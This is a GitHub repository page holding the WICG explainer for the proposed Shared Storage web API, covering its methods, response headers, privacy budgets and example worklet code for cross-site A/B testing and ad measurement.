wicg / shared-storage Goto Github PK

View Code? Open in Web Editor NEW

83.0 43.0 18.0 804 KB

Explainer for proposed web platform Shared Storage API

License: Other

Makefile 0.47% Bikeshed 99.53%

shared-storage's Introduction

Shared Storage API Explainer

Authors: Alex Turner, Camillia Smith Barnes, Josh Karlin, Yao Xiao

Introduction

In order to prevent cross-site user tracking, browsers are partitioning all forms of storage (cookies, localStorage, caches, etc) by top-frame site. But, there are many legitimate use cases currently relying on unpartitioned storage that will vanish without the help of new web APIs. We’ve seen a number of APIs proposed to fill in these gaps (e.g., Conversion Measurement API, Private Click Measurement, Storage Access, Private State Tokens, TURTLEDOVE, FLoC) and some remain (including cross-origin A/B experiments and user measurement). We propose a general-purpose, low-level API that can serve a number of these use cases.

The idea is to provide a storage API (named Shared Storage) that is intentionally not partitioned by top-frame site (though still partitioned by context origin of course!). To limit cross-site reidentification of users, data in Shared Storage may only be read in a restricted environment that has carefully constructed output gates. Over time, we hope to design and add additional gates.

Specification

See the draft specification.

Demonstration

You can try it out using Chrome 104+ (currently in canary and dev channels as of June 7th 2022).

Simple example: Consistent A/B experiments across sites

A third-party, a.example, wants to randomly assign users to different groups (e.g. experiment vs control) in a way that is consistent cross-site.

To do so, a.example writes a seed to its shared storage (which is not added if already present). a.example then registers and runs an operation in the shared storage worklet that assigns the user to a group based on the seed and the experiment name and chooses the appropriate ad for that group.

In an a.example document:

function generateSeed() { … }
await window.sharedStorage.worklet.addModule('experiment.js');

// Only write a cross-site seed to a.example's storage if there isn't one yet.
window.sharedStorage.set('seed', generateSeed(), { ignoreIfPresent: true });

// Fenced frame config contains an opaque form of the URL (urn:uuid) that is created by 
// privileged code to avoid leaking the chosen input URL back to the document.

const fencedFrameConfig = await window.sharedStorage.selectURL(
  'select-url-for-experiment',
  [
    {url: "blob:https://a.example/123…", reportingMetadata: {"click": "https://report.example/1..."}},
    {url: "blob:https://b.example/abc…", reportingMetadata: {"click": "https://report.example/a..."}},
    {url: "blob:https://c.example/789…"}
  ],
  { 
    data: { name: 'experimentA' }, 
    resolveToConfig: true
  }
);

document.getElementById('my-fenced-frame').config = fencedFrameConfig;

Worklet script (i.e. experiment.js):

class SelectURLOperation {
  hash(experimentName, seed) { … }

  async run(data, urls) {
    const seed = await this.sharedStorage.get('seed');
    return hash(data.name, seed) % urls.length;
  }
}
register('select-url-for-experiment', SelectURLOperation);

While the worklet script outputs the chosen index for urls, note that the browser process converts the index into a non-deterministic opaque URL, and is returned via fenced frame config, which can only be read or rendered in a fenced frame. Because of this, the a.example iframe cannot itself work out which ad was chosen. Yet, it is still able to customize the ad it rendered based on this protected information.

Goals

This API intends to support a wide array of use cases, replacing many of the existing uses of third-party cookies. These include recording (aggregate) statistics — e.g. demographics, reach, interest, anti-abuse, and conversion measurement — A/B experimentation, different documents depending on if the user is logged in, and interest-based selection. Enabling these use cases will help to support a thriving open web. Additionally, by remaining generic and flexible, this API aims to foster continued growth, experimentation, and rapid iteration in the web ecosystem and to avert ossification and unnecessary rigidity.

However, this API also seeks to avoid the privacy loss and abuses that third-party cookies have enabled. In particular, it aims to limit cross-site reidentification of a user. Wide adoption of this more privacy-preserving API by developers will make the web much more private by default in comparison to the third-party cookies it helps to replace.

Related work

There have been multiple privacy proposals (SPURFOWL, SWAN, Aggregated Reporting) that have a notion of write-only storage with limited output. This API is similar to those, but tries to be more general to support a greater number of output gates and use cases. We’d also like to acknowledge the KV Storage explainer, to which we turned for API-shape inspiration.

Fenced frame enforcement

The usage of fenced frames with the URL Selection operation will not be required until at least 2026. We will provide significant advanced notice before the fenced frame usage is required. Until 2026, you are free to use an iframe with URL Selection instead of a fenced frame.

To use an iframe, omit passing in the resolveToConfig flag or set it to false, and set the returned opaque URN to the src attribute of the iframe.

const opaqueURN = await window.sharedStorage.selectURL(
  'select-url-for-experiment',
  { 
    data: { ... } 
  }
);

document.getElementById('my-iframe').src = opaqueURN;

Proposed API surface

Outside the worklet

The setter methods (set, append, delete, and clear) should be made generally available across most any context. That includes top-level documents, iframes, shared storage worklets, Protected Audience worklets, service workers, dedicated workers, etc.

The shared storage worklet invocation methods (addModule, run, and selectURL) are available within document contexts.

window.sharedStorage.set(key, value, options)
- Sets key’s entry to value.
- key and value are both strings.
- Options include:
  - ignoreIfPresent (defaults to false): if true, a key’s entry is not updated if the key already exists. The embedder is not notified which occurred.
window.sharedStorage.append(key, value)
- Appends value to the entry for key. Equivalent to set if the key is not present.
window.sharedStorage.delete(key)
- Deletes the entry at the given key.
window.sharedStorage.clear()
- Deletes all entries.
window.sharedStorage.worklet.addModule(url, options)
- Loads and adds the module to the worklet (i.e. for registering operations). The handling should follow the worklet standard, unless clarified otherwise below.
- This method can only be invoked once per worklet. This is because after the initial script loading, shared storage data (for the invoking origin) will be made accessible inside the worklet environment, which can be leaked via subsequent addModule() (e.g. via timing).
- url's origin need not match that of the context that invoked addModule(url).
  - If url is cross-origin to the invoking context, the worklet will use the invoking context's origin as its partition origin for accessing shared storage data and for budget checking and withdrawing.
  - Also, for a cross-originurl, the CORS protocol applies.
- Redirects are not allowed.
window.sharedStorage.worklet.run(name, options),
window.sharedStorage.worklet.selectURL(name, urls, options), …
- Runs the operation previously registered by register() with matching name. Does nothing if there’s no matching operation.
- Each operation returns a promise that resolves when the operation is queued:
  - run() returns a promise that resolves into undefined.
  - selectURL() returns a promise that resolves into a fenced frame config for fenced frames, and an opaque URN for iframes for the URL selected from urls.
    - urls is a list of dictionaries, each containing a candidate URL url and optional reporting metadata (a dictionary, with the key being the event type and the value being the reporting URL; identical to Protected Audience's registerAdBeacon() parameter), with a max length of 8.
      - The url of the first dictionary in the list is the default URL. This is selected if there is a script error, or if there is not enough budget remaining.
      - The reporting metadata will be used in the short-term to allow event-level reporting via window.fence.reportEvent() as described in the Protected Audience explainer.
    - There will be a per-site (the site of the Shared Storage worklet) budget for selectURL. This is to limit the rate of leakage of cross-site data learned from the selectURL to the destination pages that the resulting Fenced Frames navigate to. Each time a Fenced Frame navigates the top frame, for each selectURL() involved in the creation of the Fenced Frame, log(|urls|) bits will be deducted from the corresponding site’s budget. At any point in time, the current budget remaining will be calculated as max_budget - sum(deductions_from_last_24hr)
    - The promise resolves to a fenced frame config only when resolveToConfig property is set to true. If the property is set to false or not set, the promise resolves to an opaque URN that can be rendered by an iframe.
- Options can include:
  - data, an arbitrary serializable object passed to the worklet.
  - keepAlive (defaults to false), a boolean denoting whether the worklet should be retained after it completes work for this call.
    - If keepAlive is false or not specified, the worklet will shutdown as soon as the operation finishes and subsequent calls to it will fail.
    - To keep the worklet alive throughout multiple calls to run() and/or selectURL(), each of those calls must include keepAlive: true in the options dictionary.
window.sharedStorage.run(name, options),
window.sharedStorage.selectURL(name, urls, options), …
- The behavior is identical to window.sharedStorage.worklet.run(name, options) and window.sharedStorage.worklet.selectURL(name, urls, options).
window.sharedStorage.createWorklet(url, options)
- Creates a new worklet, and loads and adds the module to the worklet (similar to the handling for window.sharedStorage.worklet.addModule(url, options)).
- By default, the worklet uses the invoking context's origin as its partition origin for accessing shared storage data and for budget checking and withdrawing.
  - To instead use the worklet script origin (i.e. url's origin) as the partition origin for accessing shared storage, pass the dataOrigin option with "script-origin" as its value in the options dictionary.
  - Currently, the dataOrigin option, if used, is restricted to having either "script-origin" or "context-origin" as its value. "script-origin" designates the worklet script origin as the data partition origin; "context-origin" designates the invoking context origin as the data partition origin.
- The object that the returned Promise resolves to has the same type with the implicitly constructed window.sharedStorage.worklet. However, for a worklet created via window.sharedStorage.createWorklet(url, options), only selectURL() and run() are available, whereas calling addModule() will throw an error. This is to prevent leaking shared storage data via addModule(), similar to the reason why addModule() can only be invoked once on the implicitly constructed window.sharedStorage.worklet.
- Redirects are not allowed.
- When the module script's URL's origin is cross-origin with the worklet's creator window's origin and when dataOrigin is "script-origin", a Shared-Storage-Cross-Origin-Worklet-Allowed: ?1 response header is required.
- The script server must carefully consider the security risks of allowing worklet creation by other origins (via Shared-Storage-Cross-Origin-Worklet-Allowed: ?1 and CORS), because this will also allow the worklet creator to run subsequent operations, and a malicious actor could poison and use up the worklet origin's budget.

In the worklet, during `sharedStorage.worklet.addModule(url, options)` or `sharedStorage.createWorklet(url, options)`

register(name, operation)
- Registers a shared storage worklet operation with the provided name.
- operation should be a class with an async run() method.
  - For the operation to work with sharedStorage.run(), run() should take data as an argument and return nothing. Any return value is ignored.
  - For the operation to work with sharedStorage.selectURL(), run() should take data and urls as arguments and return the index of the selected URL. Any invalid return value is replaced with a default return value.

In the worklet, during an operation

sharedStorage.get(key)
- Returns a promise that resolves into the key‘s entry or an empty string if the key is not present.
sharedStorage.length()
- Returns a promise that resolves into the number of keys.
sharedStorage.keys() and sharedStorage.entries()
- Returns an async iterator for all the stored keys or [key, value] pairs, sorted in the underlying key order.
sharedStorage.set(key, value, options), sharedStorage.append(key, value), sharedStorage.delete(key), and sharedStorage.clear()
- Same as outside the worklet, except that the promise returned only resolves into undefined when the operation has completed.
sharedStorage.remainingBudget()
- Returns a number indicating the remaining available privacy budget for sharedStorage.selectURL(), in bits.
sharedStorage.context
- From inside a worklet created inside a fenced frame, returns a string of contextual information, if any, that the embedder had written to the fenced frame's FencedFrameConfig before the fenced frame's navigation.
- If no contextual information string had been written for the given frame, returns undefined.
Functions exposed by the Private Aggregation API, e.g. privateAggregation.contributeToHistogram().
- These functions construct and then send an aggregatable report for the private, secure aggregation service.
- The report contents (e.g. key, value) are encrypted and sent after a delay. The report can only be read by the service and processed into aggregate statistics.
- After a Shared Storage operation has been running for 5 seconds, Private Aggregation contributions are timed out. Any future contributions are ignored and contributions already made are sent in a report as if the Shared Storage operation had completed.
Unrestricted access to identifying operations that would normally use up part of a page’s privacy budget, e.g. navigator.userAgentData.getHighEntropyValues()

From response headers

set(), append(), delete(), and clear() operations can be triggered via the HTTP response header Shared-Storage-Write.
This may provide a large performance improvement over creating a cross-origin iframe and writing from there, if a network request is otherwise required.
Shared-Storage-Write is a List Structured Header.
- Each member of the List is a String Item or Byte Sequence denoting the operation to be performed, with any arguments for the operation as associated Parameters.
- The order of Items in the List is the order in which the operations will be performed.
- Operations correspond to Items as follows:
  - set(<key>, <value>, {ignoreIfPresent: true}) ←→ set;key=<key>;value=<value>;ignore_if_present
  - set(<key>, <value>, {ignoreIfPresent: false}) ←→ set;key=<key>;value=<value>;ignore_if_present=?0
  - set(<key>, <value>) ←→ set;key=<key>;value=<value>
  - append(<key>, <value>) ←→ append;key=<key>;value=<value>
  - delete(<key>) ←→ delete;key=<key>
  - clear() ←→ clear
- <key> and <value> Parameters are of type String or Byte Sequence.
  - Note that Strings are defined as zero or more printable ASCII characters, and this excludes tabs, newlines, carriage returns, and so forth.
  - To pass a key and/or value that contains non-ASCII and/or non-printable UTF-8 characters, specify it as a Byte Sequence.
    - A Byte Sequence is delimited with colons and encoded using base64.
    - The sequence of bytes obtained by decoding the base64 from the Byte Sequence must be valid UTF-8.
    - For example:
      - :aGVsbG8K: encodes "hello\n" in a UTF-8 Byte Sequence (where "\n" is the newline character).
      - :8J+YgA==: encodes "😀" in a UTF-8 Byte Sequence.
    - Remember that results returned via get() are UTF-16 DOMStrings.
Performing operations via response headers requires a prior opt-in via a corresponding HTTP request header Sec-Shared-Storage-Writable: ?1.
The request header can be sent along with fetch requests via specifying an option: fetch(<url>, {sharedStorageWritable: true}).
The request header can alternatively be sent on document or image requests either
- via specifying a boolean content attribute, e.g.:
  - <iframe src=[url] sharedstoragewritable></iframe>
  - <img src=[url] sharedstoragewritable>
- or via an equivalent boolean IDL attribute, e.g.:
  - iframe.sharedStorageWritable = true
  - img.sharedStorageWritable = true.
Redirects will be followed, and the request header will be sent to the host server for the redirect URL.
The origin used for Shared Storage is that of the server that sends the Shared-Storage-Write response header(s).
- If there are no redirects, this will be the origin of the request URL.
- If there are redirects, the origin of the redirect URL that is accompanied by the Shared-Storage-Write response header(s) will be used.
The response header will only be honored if the corresponding request included the request header: Sec-Shared-Storage-Writable: ?1.
See example usage below.

Example scenarios

The following describe example use cases for Shared Storage and we welcome feedback on additional use cases that Shared Storage may help address.

Cross-site reach measurement

Measuring the number of users that have seen an ad.

In the ad’s iframe:

await window.sharedStorage.worklet.addModule('reach.js');
await window.sharedStorage.run('send-reach-report', {
  // optional one-time context
  data: { campaignId: '1234' },
});

Worklet script (i.e. reach.js):

class SendReachReportOperation {
  async run(data) {
    const reportSentForCampaign = `report-sent-${data.campaignId}`;

    // Compute reach only for users who haven't previously had a report sent for this campaign.
    // Users who had a report for this campaign triggered by a site other than the current one will
    // be skipped.
    if (await this.sharedStorage.get(reportSentForCampaign) === 'yes') {
      return; // Don't send a report.
    }

    // The user agent will send the report to a default endpoint after a delay.
    privateAggregation.contributeToHistogram({
      bucket: data.campaignId,
      value: 128, // A predetermined fixed value; see Private Aggregation API explainer: Scaling values.
    });

    await this.sharedStorage.set(reportSentForCampaign, 'yes');
  }
}
register('send-reach-report', SendReachReportOperation);

Creative selection by frequency

If an ad creative has been shown to the user too many times, a different ad should be selected.

In the advertiser's iframe:

// Fetches two ads in a list. The second is the proposed ad to display, and the first 
// is the fallback in case the second has been shown to this user too many times.
const ads = await advertiser.getAds();

// Register the worklet module
await window.sharedStorage.worklet.addModule('creative-selection-by-frequency.js');

// Run the URL selection operation
const frameConfig = await window.sharedStorage.selectURL(
  'creative-selection-by-frequency', 
  ads.urls, 
  { 
    data: { 
      campaignId: ads.campaignId 
    },
    resolveToConfig: true,
  });

// Render the frame
document.getElementById('my-fenced-frame').config = frameConfig;

In the worklet script (creative-selection-by-frequency.js):

class CreativeSelectionByFrequencyOperation {
  async run(data, urls) {
    // By default, return the default url (0th index).
    let index = 0;

    let count = await this.sharedStorage.get(data.campaignId);
    count = count ? parseInt(count) : 0;

    // If under cap, return the desired ad.
    if (count < 3) {
      index = 1;
      this.sharedStorage.set(data.campaignId, (count + 1).toString());
    }

    return index;
  }
}

register('creative-selection-by-frequency', CreativeSelectionByFrequencyOperation);

K+ frequency measurement

By instead maintaining a counter in shared storage, the approach for cross-site reach measurement could be extended to K+ frequency measurement, i.e. measuring the number of users who have seen K or more ads on a given browser, for a pre-chosen value of K. A unary counter can be maintained by calling window.sharedStorage.append("freq", "1") on each ad view. Then, the send-reach-report operation would only send a report if there are more than K characters stored at the key "freq". This counter could also be used to filter out ads that have been shown too frequently (similarly to the A/B example above).

Reporting embedder context

In using the Private Aggregation API to report on advertisements within fenced frames, for instance, we might report on viewability, performance, which parts of the ad the user engaged with, the fact that the ad showed up at all, and so forth. But when reporting on the ad, it might be important to tie it to some contextual information from the embedding publisher page, such as an event-level ID.

In a scenario where the input URLs for the fenced frame must be k-anonymous, e.g. if we create a FencedFrameConfig from running a Protected Audience auction, it would not be a good idea to rely on communicating the event-level ID to the fenced frame by attaching an identifier to any of the input URLs, as this would make it difficult for any input URL(s) with the attached identifier to reach the k-anonymity threshold.

Instead, before navigating the fenced frame to the auction's winning FencedFrameConfig fencedFrameConfig, we could write the event-level ID to fencedFrameConfig using fencedFrameConfig.setSharedStorageContext() as in the example below.

Subsequently, anything we've written to fencedFrameConfig through setSharedStorageContext() prior to the fenced frame's navigation to fencedFrameConfig, can be read via sharedStorage.context from inside a shared storage worklet created by the fenced frame, or created by any of its same-origin children.

In the embedder page:

// See https://github.com/WICG/turtledove/blob/main/FLEDGE.md for how to write an auction config.
const auctionConfig = { ... };

// Run a Protected Audience auction, setting the option to "resolveToConfig" to true. 
auctionConfig.resolveToConfig = true;
const fencedFrameConfig = await navigator.runAdAuction(auctionConfig);

// Write to the config any desired embedder contextual information as a string.
fencedFrameConfig.setSharedStorageContext("My Event ID 123");

// Navigate the fenced frame to the config.
document.getElementById('my-fenced-frame').config = fencedFrameConfig;

In the fenced frame (my-fenced-frame):

// Save some information we want to report that's only available inside the fenced frame.
const frameInfo = { ... };

// Send a report using shared storage and private aggregation.
await window.sharedStorage.worklet.addModule('report.js');
await window.sharedStorage.run('send-report', {
  data: { info: frameInfo },
});

In the worklet script (report.js):

class ReportingOperation {
  async run(data) {
    // Helper functions that map the embedder context to a predetermined bucket and the 
    // frame info to an appropriately-scaled value. 
    // See also https://github.com/patcg-individual-drafts/private-aggregation-api#examples
    function convertEmbedderContextToBucketId(context) { ... }
    function convertFrameInfoToValue(info) { ... }
    
    // The user agent sends the report to the reporting endpoint of the script's
    // origin (that is, the caller of `sharedStorage.run()`) after a delay.
    privateAggregation.contributeToHistogram({
      bucket: convertEmbedderContextToBucketId(sharedStorage.context) ,
      value: convertFrameInfoToValue(data.info)
    });
  }
}
register('send-report', ReportingOperation);

Keeping a worklet alive for multiple operations

Callers may wish to run multiple worklet operations from the same context, e.g. they might select a URL and then send one or more aggregatable reports. To do so, they would need to use the keepAlive: true option when calling each of the worklet operations (except perhaps in the last call, if there was no need to extend the worklet's lifetime beyond that call).

As an example, in the embedder page:

// Load the worklet module.
await window.sharedStorage.worklet.addModule('worklet.js');

// Select a URL, keeping the worklet alive.
const fencedFrameConfig = await window.selectURL(
  [
    {url: "blob:https://a.example/123…"},
    {url: "blob:https://b.example/abc…"}
  ],
  {
    data: { ... },
    keepAlive: true,
    resolveToConfig: true
  }
);

// Navigate a fenced frame to the resulting config.
document.getElementById('my-fenced-frame').config = fencedFrameConfig;

// Send some report, keeping the worklet alive.
await window.sharedStorage.run('report', {
  data: { ... },
  keepAlive: true,
});

// Send another report, allowing the worklet to close afterwards.
await window.sharedStorage.run('report', {
  data: { ... },
});

// From this point on, if we make any additional worklet calls, they will fail.

In the worklet script (worklet.js):

class URLOperation {
  // See previous examples for how to write a `selectURL()` operation class.
  async run(urls, data) { ... }
}

class ReportOperation {
  // See previous examples for how to write a `run()` operation class.
  async run(data) { ... }
}

register('select-url', URLOperation);
register('report', ReportOperation);

Loading cross-origin worklet scripts

There are currently four (4) approaches to creating a worklet that loads cross-origin script. The partition origin for the worklet's shared storage data access depends on the approach.

Using the context origin as data partition origin

The first three (3) approaches use the invoking context's origin as the partition origin for shared storage data access and the invoking context's site for shared storage budget withdrawals.

Call addModule() with a cross-origin script.

In an "https://a.example" context in the embedder page:
```
await sharedStorage.worklet.addModule("https://b.example/worklet.js");
```
For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://a.example" (i.e. the context origin) will be used.
Call createWorklet() with a cross-origin script.

In an "https://a.example" context in the embedder page:
```
const worklet = await sharedStorage.createWorklet("https://b.example/worklet.js");
```
For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://a.example" (i.e. the context origin) will be used.
Call createWorklet() with a cross-origin script, setting its dataOption to the invoking context's origin.

In an "https://a.example" context in the embedder page:
```
const worklet = await sharedStorage.createWorklet("https://b.example/worklet.js", {dataOrigin: "context-origin"});
```
For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://a.example" (i.e. the context origin) will be used.

Using the worklet script origin as data partition origin

The fourth approach uses the worklet script's origin as the partition origin for shared storage data access and the worklet script's site for shared storage budget withdrawals.

Call createWorklet() with a cross-origin script, setting its dataOption to the worklet script's origin.

In an "https://a.example" context in the embedder page:
```
const worklet = await sharedStorage.createWorklet("https://b.example/worklet.js", {dataOrigin: "script-origin"});
```
For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://b.example" (i.e. the worklet script origin) will be used.

Writing to Shared Storage via response headers

For an origin making changes to their Shared Storage data at a point when they do not need to read the data, an alternative to using the Shared Storage JavaScript API is to trigger setter and/or deleter operations via the HTTP response header Shared-Storage-Write as in the examples below.

In order to perform operations via response header, the origin must first opt-in via one of the methods below, causing the HTTP request header Sec-Shared-Storage-Writable: ?1 to be added by the user agent if the request is eligible based on permissions checks.

An origin a.example could initiate such a request in multiple ways.

On the client side, to initiate the request:

fetch() option:

fetch("https://a.example/path/for/updates", {sharedStorageWritable: true});

Content attribute option with an iframe (also possible with an img):

 <iframe src="https://a.example/path/for/updates" sharedstoragewritable></iframe>

IDL attribute option with an iframe (also possible with an img):

let iframe = document.getElementById("my-iframe");
iframe.sharedStorageWritable = true;
iframe.src = "https://a.example/path/for/updates";

On the server side, here is an example response header:

Shared-Storage-Write: clear, set;key="hello";value="world";ignore_if_present, append;key="good";value="bye", delete;key="hello", set;key="all";value="done"

Sending the above response header would be equivalent to making the following calls in the following order on the client side, from either the document or a worklet:

sharedStorage.clear();
sharedStorage.set("hello", "world", {ignoreIfPresent: true});
sharedStorage.append("good", "bye");
sharedStorage.delete("hello");
sharedStorage.set("all", "done");

Worklets can outlive the associated document

After a document dies, the corresponding worklet (if running an operation) will continue to be kept alive for a maximum of two seconds to allow the pending operation(s) to execute. This gives more confidence that any end-of-page operations (e.g. reporting) are able to finish.

Permissions Policy

Shared storage methods can be disallowed by the "shared-storage" policy-controlled feature. Its default allowlist is * (i.e. every origin).

The sharedStorage.selectURL() method can be disallowed by the "shared-storage-select-url" policy-controlled feature. Its default allowlist is * (i.e. every origin).

Permissions Policy inside the shared storage worklet

The permissions policy inside the shared storage worklet will inherit the permissions policy of the associated document.

The Private Aggregation API will be controlled by the "private-aggregation" policy-controlled feature: within the shared storage worklet, if the "private-aggregation" policy-controlled feature is disabled, the privateAggregation methods will throw an exception.

Data Retention Policy

Each key is cleared after thirty days of last write (set or append call). If ignoreIfPresent is true, the last write time is updated.

Data Storage Limits

Shared Storage is not subject to the quota manager, as that would leak information across sites. Therefore we limit its size in the following way: Shared Storage allows each origin up to 5 Megabytes.

Dependencies

This API is dependent on the following other proposals:

Fenced frames (and the associated concept of fenced frame configs) to render the chosen URL without leaking the choice to the top-level document.
Private Aggregation API to send aggregatable reports for processing in the private, secure aggregation service. Details and limitations are explored in the linked explainer.

Output gates and privacy

The privacy properties of shared storage are enforced through limited output. So we must protect against any unintentional output channels, as well as against abuse of the intentional output channels.

URL selection

The worklet selects from a small list of (up to 8) URLs, each in its own dictionary with optional reporting metadata. The chosen URL is stored in a fenced frame config as an opaque form that can only be read by a fenced frame; the embedder does not learn this information. The chosen URL represents up to log2(num urls) bits of cross-site information (as measured according to information theory). Once the Fenced Frame receives a user gesture and navigates to its destination page, the information within the fenced frame leaks to the destination page. To limit the rate of leakage of this data, there is a bit budget applied to the output gate. If the budget is exceeded, the selectURL() will return the default (0th index) URL.

selectURL() can be called in a top-level fenced frame, but not from within a nested fenced frame. This is to prevent leaking lots of bits all at once via selectURL() chaining (i.e. a fenced frame can call selectURL() to add a few more bits to the fenced frame's current URL and render the result in a nested fenced frame). Use cases that will benefit from selectURL() being allowed from inside the top level fenced frame: issue.

Budgeting

The rate of leakage of cross-site data need to be constrained. Therefore, we propose that there be a daily budget on how many bits of cross-site data can be leaked by the API per site. Note that each time a Fenced Frame is clicked on and navigates the top frame, up to log2(|urls|) bits of information can potentially be leaked for each selectURL() involved in the creation of the Fenced Frame. Therefore, Shared Storage will deduct that log2(|urls|) bits from the Shared Storage worklet's site's budget at that point. If the sum of the deductions from the last 24 hours exceed a threshold, then further selectURL()s will return the default value (the first url in the list) until some budget is freed up.

Why do we assume that log2(|urls|) bits of cross-site information are leaked by a call to selectURL? Because the embedder (the site calling selectURL) is providing a list of urls to choose from using cross-site information. If selectURL were abused to leak the first few bits of the user's cross-site identity, then, with 8 URLs to choose from, they could leak the first 3 bits of the id (e.g., imagine urls: https://example.com/id/000, https://example.com/id/001, https://example.com/id/010, ..., https://example.com/id/111). One can leak at most log2(|urls|) bits, and so that is what we deduct from the budget, but only after the fenced frame navigates the top page which is when its data can be communicated.

Budget Details

The budgets for bits of entropy for Shared Storage are as follows.

Long Term Budget

In the long term, selectURL() will leak bits of entropy on top-level navigation (e.g., a tab navigates). Therefore it is necessary to impose a budget for this leakage.

There is a 12 bit daily per-site budget for selectURL(), to be queried on each selectURL() call for sufficient budget and charged on navigation. This is subject to change.
The cost of a selectURL() call is log2(number of urls to selectURL() call) bits. This cost is only logged once the fenced frame holding the selected URL navigates the top frame. e.g., if the fenced frame can't communicate its contents (doesn't navigate), then there is no budget cost for that call toselectURL().
The remaining budget at any given time for a site is 12 - (the sum of the log of budget deductions from the past 24 hours).
If the remaining budget is less than log2(number of urls in selectURL() call), the default URL is returned and 1 bit is logged if the fenced frame is navigated.

Short Term Budgets

In the short term, we have event-level reporting and less-restrictive fenced frames, which allow further leakage; thus it is necessary to impose additional limits. On top of the navigation bit budget described above, there will be two more budgets, each maintained on a per top-level navigation basis. The bit values for each call to selectURL() are calculated in the same way as detailed for the navigation bit budget.

Each page load will have a per-site bit budget of 6 bits for selectURL() calls. At the start of a new top-level navigation, this budget will refresh.
Each page load will also have an overall bit budget of 12 bits for selectURL(). This budget will be contributed to by all sites on the page. As with the per-site per-page load bit budget, this budget will refresh when the top frame navigates.

Enrollment and Attestation

Use of Shared Storage requires enrollment and attestation via the Privacy Sandbox enrollment attestation model.

For each method in the Shared Storage API surface, a check will be performed to determine whether the calling site is enrolled and attested. In the case where the site is not enrolled and attested, the promise returned by the method is rejected.

Event Level Reporting

In the long term we'd like all reporting via Shared Storage to happen via the Private Aggregation output gate (or some additional noised reporting gate). We understand that in the short term it may be necessary for the industry to continue to use event-level reporting as they transition to more private reporting. Event-level reporting for content selection (selectURL()) will be available until at least 2026, and we will provide substantial notice for developers before the transition takes place.

Event level reports work in a way similar to how they work in Protected AUdience. First, when calling selectURL, the caller adds a reportingMetadata optional dict to the URLs that they wish to send reports for, such as:

sharedStorage.selectURL(
    "test-url-selection-operation",
    [{url: "fenced_frames/title0.html"},
     {url: "fenced_frames/title1.html",
         reportingMetadata: {'click': "fenced_frames/report1.html",
             'visible': "fenced_frames/report2.html"}}]);

In this case, when in the fenced frame, event types are defined for click and visibility. Once the fenced frame is ready to send a report, it can call something like:

window.fence.reportEvent({eventType: 'visible',
    eventData: JSON.stringify({'duration': duration}), 
    destination: ['shared-storage-select-url']});

and it will send a POST message with the eventData. See the fenced frame reporting document for more details.

Private aggregation

Arbitrary cross-site data can be embedded into any aggregatable report, but that data is only readable via the aggregation service. Private aggregation protects the data with differential privacy. In order to adhere to the chosen differential privacy parameters, there are limits on the total amount of value the origin's reports can provide per time-period. The details of these limits are explored in the API's explainer.

Choice of output type

The output type when running an operation must be pre-specified to prevent data leakage through the choice. This is enforced with separate functions for each output type, i.e. sharedStorage.selectURL() and sharedStorage.run().

Default values

When sharedStorage.selectURL() doesn’t return a valid output (including throwing an error), the user agent returns the first default URL, to prevent information leakage. For sharedStorage.run(), there is no output, so any return value is ignored.

Preventing timing attacks

Revealing the time an operation takes to run could also leak information. We avoid this by having sharedStorage.run() queue the operation and then immediately resolve the returned promise. For sharedStorage.selectURL(), the promise resolves into an fenced frame config that contains the opaque URL that is mapped to the selected URL once the operation completes. A Fenced Frame can be created with the returned fenced frame config even before the selectURL operation has completed. The frame will wait for it to complete first. Similarly, outside a worklet, set(), remove(), etc. return promises that resolve after queueing the writes. Inside a worklet, these writes join the same queue but their promises only resolve after completion.

Possibilities for extension

Allowing noised data as output to the embedder

We could consider allowing the worklet to send data directly to the embedder, with some local differential privacy guarantees. These might look similar to the differential privacy protections that we apply in the Private Aggregation API.

Interactions between worklets

Communication between worklets is not possible in the initial design. However, adding support for this would enable multiple origins to flexibly share information without needing a dedicated origin for that sharing. Relatedly, allowing a worklet to create other worklets might be useful.

Registering event handlers

We could support event handlers in future iterations. For example, a handler could run a previously registered operation when a given key is modified (e.g. when an entry is updated via a set or append call):

sharedStorage.addEventListener(
  'key' /* event_type */,
  'operation-to-run' /* operation_name */,
  { key: 'example-key', actions: ['set', 'append'] } /* options */);

Acknowledgements

Many thanks for valuable feedback and advice from:

Victor Costan, Christian Dullweber, Charlie Harrison, Jeff Kaufman, Rowan Merewood, Marijn Kruisselbrink, Nasko Oskov, Evgeny Skvortsov, Michael Tomaine, David Turner, David Van Cleve, Zheng Wei, Mike West.

shared-storage's People

Contributors

Stargazers

Watchers

Forkers

martiy74 kingluigi21 samdutton etrouton xyaoinum appalachianboomstick gtanzer zhengweiwithoutthei spacegnome tprieur jdfreder gota0 denji shivanigithub seanpm2001 yasaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa patmmccann omriariav

shared-storage's Issues

Usage of shared-storage in privacy-sandbox/fledge

Hi!
After reading this proposal, this seems to be fairly close to the FLEDGE proposal ( https://github.com/WICG/turtledove/blob/main/FLEDGE.md ) that is being currently implemented in Chromium.

Can you please shed light on how you see both proposals interacting ?
In particular, should we understand that both proposals are "compatible" ? By this I mean, would a Fledge bidding worklet be able within its own worklet to call sharedStorage.get(key) ? (this worklet would be a "fledge" auction worklet and not a "shared-storage" worklet)

Should worklets get to run past the duration of the page?

This seems necessary since the caller has no idea when the worklet finishes, so how can it know when it can navigate away from the page, unless it’s confident that the worklet will continue to run after the navigation?

We’d need a timeout. How long should it be?

Spec: wait until operation is complete to terminate the global scope

Currently, the run() and selectURL() steps in the spec uses the return promise resolving as the signal to maybe terminate the global scope. But, the promise is immediately resolved (to avoid leaks). So, we need a new signal to trigger this case.

Spec: throw error when run() or selectURL() is called during initial module script execution

In the definitions of run() and selectURL(), it says "If addModule() has not yet been called, [error]". To align with the implementation, this should probably be modified to something like "If addModule()'s returned promise has not yet resolved"? (i.e. we need to wait for the module script execution to complete first)

Consider changing the Shared Storage API length() method name to something more descriptive

Currently, the method for querying the number of keys stored for an origin is called length(). Perhaps a better name would be numKeys() or keyCount().

sharedStorage.selectURL doesnt return FencedFrameConfig

Hello,
trying out sharedStorage.selectURL as in example:
https://github.com/WICG/shared-storage#simple-example-consistent-ab-experiments-across-sites

using resolveToConfig: true, doesn't return FencedFrameConfig but just resolves as opaque URN.

Is there anything else that needs to be enabled to test this feature?

Extending shared storage API to support advanced reach reporting

We are excited about the shared storage API and its support of Reach measurement.

